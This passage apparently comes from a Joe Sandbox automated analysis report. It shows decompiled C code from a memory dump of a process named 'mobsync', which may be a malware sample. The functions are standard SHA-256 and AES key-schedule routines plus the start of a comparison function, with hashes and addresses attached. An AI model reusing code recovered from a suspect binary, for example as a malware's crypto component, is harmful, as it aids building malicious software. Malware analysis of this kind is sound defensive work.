				signed int _t245;
				signed int _t246;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t294;
				intOrPtr _t295;
				unsigned int _t297;
				void* _t299;
				signed int _t301;
				void* _t400;
				void* _t401;
				void* _t402;
				void* _t403;
				void* _t404;
				void* _t405;
				void* _t406;
				void* _t407;
				void* _t408;
				void* _t409;
				void* _t411;
				void* _t412;
				void* _t413;
				void* _t414;
				void* _t415;
				void* _t422;
				void* _t423;
				void* _t424;
				void* _t425;
				void* _t426;
				void* _t433;
				void* _t434;
				void* _t435;
				void* _t436;
				void* _t437;
				void* _t444;
				void* _t445;
				void* _t446;
				void* _t447;
				void* _t448;
				signed int _t454;
				void* _t455;
				void* _t456;
				void* _t457;
				void* _t458;
				void* _t459;
				signed int _t465;
				void* _t466;
				void* _t467;
				void* _t468;
				void* _t469;
				void* _t470;
				signed int _t476;
				void* _t477;
				void* _t478;
				void* _t479;
				void* _t480;
				void* _t481;
				signed int _t487;
				void* _t506;
				void* _t513;
				void* _t520;
				void* _t527;
				void* _t534;
				void* _t541;
				void* _t548;
				void* _t555;
				unsigned int _t558;
				signed int _t563;
				signed int _t568;
				signed int _t573;
				signed int _t578;
				signed int _t583;
				signed int _t588;
				signed int _t593;
				signed int _t598;
				void* _t603;

				_t400 = __edx;
				_v12 = 0x30;
				_t301 = 8;
				_v76 = __ecx;
				memcpy( &_v72, __ecx, _t301 << 2);
				_push(0x10);
				_t204 = memcpy( &_v332, _t400, 0 << 2);
				_v40 = _t204;
				do {
					_t558 =  *_t204;
					_t297 =  *(_t204 - 0x34);
					_t401 = 0x13;
					_t205 = L0042DF6A(_t558, _t401);
					_t402 = 0x11;
					_t206 = L0042DF6A(_t558, _t402);
					_t403 = 0x12;
					_t207 = L0042DF6A(_t297, _t403);
					_t404 = 7;
					_t208 = L0042DF6A(_t297, _t404);
					_t209 = _v40;
					 *((intOrPtr*)(_t209 + 8)) = (_t205 ^ _t206 ^ _t558 >> 0x0000000a) + (_t207 ^ _t208 ^ _t297 >> 0x00000003) +  *((intOrPtr*)(_t209 - 0x38)) +  *((intOrPtr*)(_t209 - 0x14));
					_t204 = _t209 + 4;
					_t14 =  &_v12;
					 *_t14 = _v12 - 1;
					_v40 = _t204;
				} while ( *_t14 != 0);
				_v40 = _v40 & 0x00000000;
				_t563 = _v44;
				_v32 = _v60;
				_v20 = _v48;
				_v24 = _v64;
				_v16 = _v52;
				_t212 = _v56;
				_v28 = _v68;
				_t299 = 2;
				_v8 = _v56;
				_v36 = _v72;
				do {
					_t405 = 0x19;
					_t213 = L0042DF6A(_t212, _t405);
					_t406 = 0xb;
					_t214 = L0042DF6A(_v8, _t406);
					_t407 = 6;
					_t215 = L0042DF6A(_v8, _t407);
					_t216 = _v40;
					_t42 = _t216 + 0x465670; // 0x428a2f98
					_t506 = (_t213 ^ _t214 ^ _t215) + ((_v16 ^ _v20) & _v8 ^ _v20) +  *_t42 +  *((intOrPtr*)(_t603 + _v40 - 0x148)) + _t563;
					_v32 = _v32 + _t506;
					_t408 = 0x16;
					_t217 = L0042DF6A(_v36, _t408);
					_t409 = 0xd;
					_t218 = L0042DF6A(_v36, _t409);
					_t219 = L0042DF6A(_v36, _t299);
					_t568 = _v32;
					_v12 = ((_v28 | _v36) & _v24 | _v28 & _v36) + (_t217 ^ _t218 ^ _t219) + _t506;
					_t411 = 0x19;
					_t222 = L0042DF6A(_t568, _t411);
					_t412 = 0xb;
					_t223 = L0042DF6A(_t568, _t412);
					_t413 = 6;
					_t224 = L0042DF6A(_t568, _t413);
					_t225 = _v40;
					_t60 = _t225 + 0x465674; // 0x71374491
					_t513 = (_t222 ^ _t223 ^ _t224) + ((_v16 ^ _v8) & _t568 ^ _v16) +  *_t60 +  *((intOrPtr*)(_t603 + _v40 - 0x144)) + _v20;
					_v24 = _v24 + _t513;
					_t414 = 0x16;
					_t226 = L0042DF6A(_v12, _t414);
					_t415 = 0xd;
					_t227 = L0042DF6A(_v12, _t415);
					_t228 = L0042DF6A(_v12, _t299);
					_t573 = _v24;
					_v20 = ((_v36 | _v12) & _v28 | _v36 & _v12) + (_t226 ^ _t227 ^ _t228) + _t513;
					_t422 = 0x19;
					_t231 = L0042DF6A(_t573, _t422);
					_t423 = 0xb;
					_t232 = L0042DF6A(_t573, _t423);
					_t424 = 6;
					_t233 = L0042DF6A(_t573, _t424);
					_t234 = _v40;
					_t79 = _t234 + 0x465678; // 0xb5c0fbcf
					_t520 = (_t231 ^ _t232 ^ _t233) + ((_v32 ^ _v8) & _t573 ^ _v8) +  *_t79 +  *((intOrPtr*)(_t603 + _v40 - 0x140)) + _v16;
					_v28 = _v28 + _t520;
					_t425 = 0x16;
					_t235 = L0042DF6A(_v20, _t425);
					_t426 = 0xd;
					_t236 = L0042DF6A(_v20, _t426);
					_t237 = L0042DF6A(_v20, _t299);
					_t578 = _v28;
					_v16 = ((_v12 | _v20) & _v36 | _v12 & _v20) + (_t235 ^ _t236 ^ _t237) + _t520;
					_t433 = 0x19;
					_t240 = L0042DF6A(_t578, _t433);
					_t434 = 0xb;
					_t241 = L0042DF6A(_t578, _t434);
					_t435 = 6;
					_t242 = L0042DF6A(_t578, _t435);
					_t243 = _v40;
					_t98 = _t243 + 0x46567c; // 0xe9b5dba5
					_t527 = (_t240 ^ _t241 ^ _t242) + ((_v24 ^ _v32) & _t578 ^ _v32) +  *_t98 +  *((intOrPtr*)(_t603 + _v40 - 0x13c)) + _v8;
					_v36 = _v36 + _t527;
					_t436 = 0x16;
					_t244 = L0042DF6A(_v16, _t436);
					_t437 = 0xd;
					_t245 = L0042DF6A(_v16, _t437);
					_t246 = L0042DF6A(_v16, _t299);
					_t583 = _v36;
					_v8 = ((_v16 | _v20) & _v12 | _v16 & _v20) + (_t244 ^ _t245 ^ _t246) + _t527;
					_t444 = 0x19;
					_t249 = L0042DF6A(_t583, _t444);
					_t445 = 0xb;
					_t250 = L0042DF6A(_t583, _t445);
					_t446 = 6;
					_t251 = L0042DF6A(_t583, _t446);
					_t252 = _v40;
					_t117 = _t252 + 0x465680; // 0x3956c25b
					_t534 = (_t249 ^ _t250 ^ _t251) + ((_v24 ^ _v28) & _t583 ^ _v24) +  *_t117 +  *((intOrPtr*)(_t603 + _v40 - 0x138)) + _v32;
					_t254 = _v12 + _t534;
					_t447 = 0x16;
					_v12 = _t254;
					_v44 = _t254;
					_t255 = L0042DF6A(_v8, _t447);
					_t448 = 0xd;
					_t256 = L0042DF6A(_v8, _t448);
					_t454 = ((_v16 | _v8) & _v20 | _v16 & _v8) + (_t255 ^ _t256 ^ L0042DF6A(_v8, _t299)) + _t534;
					_t588 = _v12;
					_v32 = _t454;
					_v60 = _t454;
					_t455 = 0x19;
					_t260 = L0042DF6A(_t588, _t455);
					_t456 = 0xb;
					_t261 = L0042DF6A(_t588, _t456);
					_t457 = 6;
					_t262 = L0042DF6A(_t588, _t457);
					_t263 = _v40;
					_t138 = _t263 + 0x465684; // 0x59f111f1
					_t541 = (_t260 ^ _t261 ^ _t262) + ((_v28 ^ _v36) & _t588 ^ _v28) +  *_t138 +  *((intOrPtr*)(_t603 + _v40 - 0x134)) + _v24;
					_t265 = _v20 + _t541;
					_t458 = 0x16;
					_v20 = _t265;
					_v48 = _t265;
					_t266 = L0042DF6A(_v32, _t458);
					_t459 = 0xd;
					_t267 = L0042DF6A(_v32, _t459);
					_t465 = ((_v32 | _v8) & _v16 | _v32 & _v8) + (_t266 ^ _t267 ^ L0042DF6A(_v32, _t299)) + _t541;
					_t593 = _v20;
					_v24 = _t465;
					_v64 = _t465;
					_t466 = 0x19;
					_t271 = L0042DF6A(_t593, _t466);
					_t467 = 0xb;
					_t272 = L0042DF6A(_t593, _t467);
					_t468 = 6;
					_t273 = L0042DF6A(_t593, _t468);
					_t158 = _v40 + 0x465688; // 0x923f82a4
					_t548 = (_t271 ^ _t272 ^ _t273) + ((_v36 ^ _v12) & _t593 ^ _v36) +  *_t158 +  *((intOrPtr*)(_t603 + _v40 - 0x130)) + _v28;
					_t276 = _v16 + _t548;
					_t469 = 0x16;
					_v16 = _t276;
					_v52 = _t276;
					_t277 = L0042DF6A(_v24, _t469);
					_t470 = 0xd;
					_t278 = L0042DF6A(_v24, _t470);
					_t476 = ((_v24 | _v32) & _v8 | _v24 & _v32) + (_t277 ^ _t278 ^ L0042DF6A(_v24, _t299)) + _t548;
					_t598 = _v16;
					_v28 = _t476;
					_v68 = _t476;
					_t477 = 0x19;
					_t282 = L0042DF6A(_t598, _t477);
					_t478 = 0xb;
					_t283 = L0042DF6A(_t598, _t478);
					_t479 = 6;
					_t284 = L0042DF6A(_t598, _t479);
					_t285 = _v40;
					_t180 = _t285 + 0x46568c; // 0xab1c5ed5
					_t555 = (_t282 ^ _t283 ^ _t284) + ((_v12 ^ _v20) & _t598 ^ _v12) +  *_t180 +  *((intOrPtr*)(_t603 + _v40 - 0x12c)) + _v36;
					_t287 = _v8 + _t555;
					_t480 = 0x16;
					_v8 = _t287;
					_v56 = _t287;
					_t288 = L0042DF6A(_v28, _t480);
					_t481 = 0xd;
					_t289 = L0042DF6A(_v28, _t481);
					_t487 = ((_v24 | _v28) & _v32 | _v24 & _v28) + (_t288 ^ _t289 ^ L0042DF6A(_v28, _t299)) + _t555;
					_t563 = _v12;
					_t294 = _v40 + 0x20;
					_v40 = _t294;
					_t212 = _v8;
					_v36 = _t487;
					_v72 = _t487;
				} while (_t294 < 0x100);
				_t295 = _v76;
				do {
					asm("movups xmm0, [eax]");
					asm("movups xmm1, [ecx+eax]");
					asm("paddd xmm1, xmm0");
					asm("movups [eax], xmm1");
					_t295 = _t295 + 0x10;
					_t299 = _t299 - 1;
				} while (_t299 != 0);
				return 0;
			}

0x0042e02d
0x0042e03b
0x0042e044
0x0042e045
0x0042e04b
0x0042e04d
0x0042e05e
0x0042e060
0x0042e063
0x0042e063
0x0042e067
0x0042e06c
0x0042e06d
0x0042e074
0x0042e079
0x0042e085
0x0042e08a
0x0042e091
0x0042e096
0x0042e0a0
0x0042e0ad
0x0042e0b0
0x0042e0b3
0x0042e0b3
0x0042e0b7
0x0042e0b7
0x0042e0c2
0x0042e0c6
0x0042e0c9
0x0042e0cf
0x0042e0d5
0x0042e0dd
0x0042e0e0
0x0042e0e3
0x0042e0e9
0x0042e0ea
0x0042e0ed
0x0042e0f0
0x0042e0f2
0x0042e0f5
0x0042e101
0x0042e102
0x0042e10e
0x0042e10f
0x0042e11f
0x0042e12c
0x0042e139
0x0042e13b
0x0042e13e
0x0042e13f
0x0042e14b
0x0042e14c
0x0042e158
0x0042e173
0x0042e176
0x0042e17d
0x0042e17e
0x0042e185
0x0042e18a
0x0042e191
0x0042e196
0x0042e1a3
0x0042e1b2
0x0042e1bf
0x0042e1c2
0x0042e1c5
0x0042e1c6
0x0042e1cf
0x0042e1d3
0x0042e1df
0x0042e1fa
0x0042e1ff
0x0042e204
0x0042e205
0x0042e20c
0x0042e211
0x0042e218
0x0042e21d
0x0042e22a
0x0042e239
0x0042e246
0x0042e249
0x0042e24c
0x0042e24d
0x0042e259
0x0042e25a
0x0042e266
0x0042e281
0x0042e286
0x0042e28b
0x0042e28c
0x0042e293
0x0042e298
0x0042e29f
0x0042e2a4
0x0042e2b1
0x0042e2c0
0x0042e2cd
0x0042e2d0
0x0042e2d3
0x0042e2d4
0x0042e2e0
0x0042e2e1
0x0042e2ed
0x0042e308
0x0042e30d
0x0042e312
0x0042e313
0x0042e31a
0x0042e31f
0x0042e326
0x0042e32b
0x0042e338
0x0042e347
0x0042e357
0x0042e35a
0x0042e35c
0x0042e35d
0x0042e360
0x0042e363
0x0042e36f
0x0042e370
0x0042e395
0x0042e397
0x0042e39c
0x0042e3a1
0x0042e3a4
0x0042e3a5
0x0042e3ac
0x0042e3b1
0x0042e3b8
0x0042e3bd
0x0042e3ca
0x0042e3d9
0x0042e3e9
0x0042e3ec
0x0042e3ee
0x0042e3ef
0x0042e3f2
0x0042e3f5
0x0042e401
0x0042e402
0x0042e427
0x0042e429
0x0042e42e
0x0042e433
0x0042e436
0x0042e437
0x0042e43e
0x0042e443
0x0042e44a
0x0042e44f
0x0042e466
0x0042e476
0x0042e47c
0x0042e480
0x0042e481
0x0042e484
0x0042e487
0x0042e493
0x0042e494
0x0042e4b9
0x0042e4bb
0x0042e4c0
0x0042e4c5
0x0042e4c8
0x0042e4c9
0x0042e4d0
0x0042e4d5
0x0042e4dc
0x0042e4e1
0x0042e4ee
0x0042e4fd
0x0042e50d
0x0042e510
0x0042e512
0x0042e513
0x0042e516
0x0042e519
0x0042e525
0x0042e526
0x0042e54b
0x0042e550
0x0042e553
0x0042e556
0x0042e55e
0x0042e561
0x0042e564
0x0042e564
0x0042e56d
0x0042e575
0x0042e575
0x0042e578
0x0042e57c
0x0042e580
0x0042e583
0x0042e586
0x0042e586
0x0042e593

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d2c2cc3d4cde4dcaf023a8c72c5331c45858dbf77c38728ee6bef2936cd2860
Instruction ID: d2f6e491d6231a107fc41d217f42edd413d61a9e26abbc05e72102d8d9d5ba4e
Opcode Fuzzy Hash: 7d2c2cc3d4cde4dcaf023a8c72c5331c45858dbf77c38728ee6bef2936cd2860
Instruction Fuzzy Hash: E4126432F002199BDF04DBA5DD52AEDB3F2BF8C714F26806AD515B7381DA746D418B88

Uniqueness

Uniqueness Score: -1.00%

Function 0042220F, Relevance: .4, Instructions: 411
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E0042220F(signed int* __ecx, void* __edx, unsigned int _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int* _v8;
				signed int _t250;
				signed int _t267;
				void* _t270;
				intOrPtr _t314;
				signed int _t330;
				signed int _t351;
				signed int _t369;
				signed int _t387;
				signed int _t406;
				signed int _t413;
				signed char* _t414;
				signed int _t425;
				signed int _t427;
				signed int _t431;
				intOrPtr _t455;
				signed int _t459;
				signed int _t461;
				signed int _t464;
				signed int _t467;
				signed int _t469;
				signed int _t470;
				signed int _t473;
				signed int _t476;
				signed int _t482;
				intOrPtr* _t493;
				signed int _t500;
				signed int _t506;
				signed int _t513;
				signed int _t519;
				signed int _t525;
				unsigned int _t527;
				signed int* _t528;
				void* _t530;
				intOrPtr* _t532;
				signed int* _t534;
				signed int* _t535;
				signed int* _t537;
				void* _t538;
				intOrPtr _t539;
				void* _t541;
				void* _t542;
				void* _t543;

				_push(__ecx);
				_t527 = _a4;
				_t537 = __ecx;
				_v8 = __ecx;
				 *(__ecx + 0xf4) = _t527;
				 *((intOrPtr*)(__ecx + 0xf0)) = (_t527 >> 2) + 6;
				L00431DF0(__ecx, __edx, _t527);
				L00421C07(_t537, _t537, _t527);
				if(_t527 == 0x10) {
					_t476 = _t537[3];
					_t528 =  &(_t537[1]);
					_t425 = ( *(0x4621e8 + (_t476 >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x461de8 + (_t476 >> 0x18) * 4) & 0x000000ff ^  *(0x4625e8 + (_t476 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4619e8 + (_t476 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t537;
					_t537[4] = _t425;
					_t250 =  *_t528 ^ _t425;
					_t427 = _t537[2] ^ _t250;
					_t537[5] = _t250;
					_t537[6] = _t427;
					_t537[7] = _t427 ^ _t476;
					_t538 = 4;
					do {
						_t528 =  &(_t528[4]);
						_t429 = _t528[2];
						_t122 = _t538 + 0x4609bc; // 0x2000000
						_t538 = _t538 + 4;
						_t482 =  *(0x461de8 + (_t528[2] >> 0x18) * 4) & 0x000000ff ^  *(0x4625e8 + (_t528[2] >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4621e8 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x4619e8 + (_t429 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t122 ^  *(_t528 - 4);
						_t528[3] = _t482;
						_t267 =  *_t528 ^ _t482;
						_t528[4] = _t267;
						_t431 = _t528[1] ^ _t267;
						_t528[5] = _t431;
						_t528[6] = _t528[2] ^ _t431;
					} while (_t538 != 0x28);
					goto L12;
				} else {
					if(_t527 == 0x18) {
						_t457 = _t537[5];
						_t534 =  &(_t537[0xa]);
						_t500 = ( *(0x4621e8 + (_t537[5] >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x461de8 + (_t457 >> 0x18) * 4) & 0x000000ff ^  *(0x4625e8 + (_t457 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4619e8 + (_t457 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t537;
						_t330 = _t537[1] ^ _t500;
						_t537[6] = _t500;
						_t537[7] = _t330;
						_t459 = _t537[2] ^ _t330;
						_t537[8] = _t459;
						_t537[9] = _t537[3] ^ _t459;
						_t542 = 4;
						do {
							_t461 =  *(_t534 - 0x18) ^  *(_t534 - 4);
							 *_t534 = _t461;
							_t534[1] =  *(_t534 - 0x14) ^ _t461;
							_t534 =  &(_t534[6]);
							_t462 =  *(_t534 - 0x14);
							_t88 = _t542 + 0x4609bc; // 0x2000000
							_t542 = _t542 + 4;
							_t506 =  *(0x461de8 + ( *(_t534 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x4625e8 + ( *(_t534 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4621e8 + (_t462 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x4619e8 + (_t462 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t88 ^  *(_t534 - 0x28);
							 *(_t534 - 0x10) = _t506;
							_t351 =  *(_t534 - 0x24) ^ _t506;
							 *(_t534 - 0xc) = _t351;
							_t464 =  *(_t534 - 0x20) ^ _t351;
							 *(_t534 - 8) = _t464;
							 *(_t534 - 4) =  *(_t534 - 0x1c) ^ _t464;
						} while (_t542 != 0x20);
						goto L12;
					} else {
						if(_t527 == 0x20) {
							_t465 = _t537[7];
							_t535 =  &(_t537[0xc]);
							_t513 = ( *(0x4621e8 + (_t537[7] >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x461de8 + (_t465 >> 0x18) * 4) & 0x000000ff ^  *(0x4625e8 + (_t465 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4619e8 + (_t465 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t537;
							_t369 = _t537[1] ^ _t513;
							_t537[8] = _t513;
							_t537[9] = _t369;
							_t467 = _t537[2] ^ _t369;
							_t537[0xa] = _t467;
							_t537[0xb] = _t537[3] ^ _t467;
							_t543 = 4;
							do {
								_t468 =  *(_t535 - 4);
								_t469 =  *(_t535 - 0x18);
								_t519 =  *(0x4625e8 + ( *(_t535 - 4) >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4621e8 + ( *(_t535 - 4) >> 0x18) * 4) & 0xff000000 ^  *(0x4619e8 + (_t468 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x461de8 + (_t468 & 0x000000ff) * 4) & 0x000000ff ^  *(_t535 - 0x20);
								_t387 =  *(_t535 - 0x1c) ^ _t519;
								 *_t535 = _t519;
								_t535[1] = _t387;
								_t535 =  &(_t535[8]);
								_t470 = _t469 ^ _t387;
								_t36 = _t535 - 0x34; // 0xfffef217
								 *(_t535 - 0x18) = _t470;
								 *(_t535 - 0x14) =  *_t36 ^ _t470;
								_t39 = _t535 - 0x14; // 0xfffef1f7
								_t471 =  *_t39;
								_t48 = _t543 + 0x4609bc; // 0x2000000
								_t543 = _t543 + 4;
								_t49 = _t535 - 0x30; // 0x8b18ec83
								_t525 =  *(0x461de8 + ( *_t39 >> 0x18) * 4) & 0x000000ff ^  *(0x4625e8 + ( *_t39 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4621e8 + (_t471 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x4619e8 + (_t471 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t48 ^  *_t49;
								 *(_t535 - 0x10) = _t525;
								_t51 = _t535 - 0x2c; // 0xafe850cc
								_t406 =  *_t51 ^ _t525;
								 *(_t535 - 0xc) = _t406;
								_t53 = _t535 - 0x28; // 0xe8fffef4
								_t473 =  *_t53 ^ _t406;
								 *(_t535 - 8) = _t473;
								_t55 = _t535 - 0x24; // 0xffff13d1
								 *(_t535 - 4) =  *_t55 ^ _t473;
							} while (_t543 != 0x1c);
							L12:
							_t539 = _v8;
							_t530 = 1;
							if(_a12 == 1) {
								_t413 =  *(_t539 + 0xf0) << 2;
								if(_t413 != 0) {
									_t493 = _t539 + (_t413 + 2) * 4;
									_t532 = _t539 + 8;
									_t541 = 0;
									do {
										_t541 = _t541 + 4;
										_t413 = _t413 - 4;
										 *((intOrPtr*)(_t532 - 8)) =  *((intOrPtr*)(_t493 - 8));
										 *((intOrPtr*)(_t493 - 8)) =  *((intOrPtr*)(_t532 - 8));
										 *((intOrPtr*)(_t532 - 4)) =  *((intOrPtr*)(_t493 - 4));
										 *((intOrPtr*)(_t493 - 4)) =  *((intOrPtr*)(_t532 - 4));
										_t455 =  *_t532;
										 *_t532 =  *_t493;
										_t532 = _t532 + 0x10;
										_t314 =  *((intOrPtr*)(_t493 + 4));
										 *_t493 = _t455;
										_t493 = _t493 - 0x10;
										 *((intOrPtr*)(_t532 - 0xc)) = _t314;
										 *((intOrPtr*)(_t493 + 0x14)) =  *((intOrPtr*)(_t532 - 0xc));
									} while (_t541 < _t413);
									_t539 = _v8;
									_t530 = 1;
								}
								if( *(_t539 + 0xf0) > _t530) {
									_t414 = _t539 + 8;
									do {
										_t414 =  &(_t414[0x10]);
										_t484 =  *(_t414 - 8);
										_t486 =  *(_t414 - 4);
										 *(_t414 - 8) =  *(0x4609e8 + ( *(0x461de8 + ( *(_t414 - 8) >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x460de8 + ( *(0x461de8 + ( *(_t414 - 8) >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4611e8 + ( *(0x461de8 + (_t484 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4615e8 + ( *(0x461de8 + ( *(_t414 - 8) & 0x000000ff) * 4) & 0x000000ff) * 4);
										_t488 =  *_t414;
										 *(_t414 - 4) =  *(0x4609e8 + ( *(0x461de8 + ( *(_t414 - 4) >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x460de8 + ( *(0x461de8 + ( *(_t414 - 4) >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4611e8 + ( *(0x461de8 + (_t486 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4615e8 + ( *(0x461de8 + ( *(_t414 - 4) & 0x000000ff) * 4) & 0x000000ff) * 4);
										_t490 = _t414[4];
										 *_t414 =  *(0x4609e8 + ( *(0x461de8 + ( *_t414 >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x460de8 + ( *(0x461de8 + ( *_t414 >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4611e8 + ( *(0x461de8 + (_t488 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4615e8 + ( *(0x461de8 + ( *_t414 & 0x000000ff) * 4) & 0x000000ff) * 4);
										_t530 = _t530 + 1;
										_t414[4] =  *(0x4609e8 + ( *(0x461de8 + (_t414[4] >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x460de8 + ( *(0x461de8 + (_t414[4] >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4611e8 + ( *(0x461de8 + (_t490 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4615e8 + ( *(0x461de8 + (_t414[4] & 0x000000ff) * 4) & 0x000000ff) * 4);
									} while (_t530 <  *(_t539 + 0xf0));
								}
							}
							_t270 = E00422806(_t539, _a8);
						} else {
							_t270 = 0xffffff53;
						}
					}
				}
				return _t270;
			}

0x00422212
0x00422216
0x00422219
0x0042221d
0x00422228
0x0042222f
0x00422235
0x0042223f
0x0042224a
0x004224d4
0x004224d7
0x00422530
0x00422532
0x00422535
0x0042253a
0x0042253c
0x0042253f
0x00422544
0x00422547
0x00422548
0x00422548
0x0042254b
0x00422595
0x0042259b
0x0042259e
0x004225a1
0x004225a6
0x004225a8
0x004225ae
0x004225b0
0x004225b8
0x004225bb
0x00000000
0x00422250
0x00422253
0x004223ca
0x004223cd
0x0042242a
0x0042242c
0x0042242e
0x00422431
0x00422434
0x0042243b
0x0042243e
0x00422441
0x00422442
0x00422445
0x0042244d
0x0042244f
0x00422452
0x00422455
0x0042249f
0x004224a5
0x004224a8
0x004224ab
0x004224b1
0x004224b3
0x004224b9
0x004224bb
0x004224c3
0x004224c6
0x00000000
0x00422259
0x0042225c
0x00422268
0x0042226b
0x004222c8
0x004222ca
0x004222cc
0x004222cf
0x004222d2
0x004222d9
0x004222dc
0x004222df
0x004222e0
0x004222e0
0x00422321
0x00422331
0x00422334
0x00422336
0x00422338
0x0042233b
0x0042233e
0x00422340
0x00422345
0x00422348
0x0042234b
0x0042234b
0x00422395
0x0042239b
0x0042239e
0x0042239e
0x004223a1
0x004223a4
0x004223a7
0x004223a9
0x004223ac
0x004223af
0x004223b1
0x004223b4
0x004223b9
0x004223bc
0x004225c0
0x004225c0
0x004225c5
0x004225c9
0x004225d5
0x004225da
0x004225df
0x004225e2
0x004225e5
0x004225e7
0x004225ea
0x004225f0
0x004225f3
0x004225f9
0x004225ff
0x00422604
0x00422607
0x00422609
0x0042260b
0x0042260e
0x00422611
0x00422613
0x00422619
0x0042261c
0x0042261f
0x00422623
0x00422628
0x00422628
0x0042262f
0x00422635
0x00422638
0x00422638
0x0042263b
0x0042266f
0x00422699
0x004226c8
0x004226f1
0x00422720
0x00422749
0x00422799
0x0042279a
0x0042279d
0x00422638
0x0042262f
0x004227ae
0x0042225e
0x0042225e
0x0042225e
0x0042225c
0x00422253
0x004227b9

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dcb447a85b1182a68abc09f72ac54cd806021c874cec78a4556c29f23593adf
Instruction ID: 73839bb05d6e719aa0e6431676c5ad9225ade293482c4aaa0957e560a066960c
Opcode Fuzzy Hash: 6dcb447a85b1182a68abc09f72ac54cd806021c874cec78a4556c29f23593adf
Instruction Fuzzy Hash: 6B029F716005518FC358CF2EEC9056AB7E1EF8E301748853AE486C73A5EB74E922DF94

Uniqueness

Uniqueness Score: -1.00%

Function 0043424F, Relevance: .3, Instructions: 341
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0043424F(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
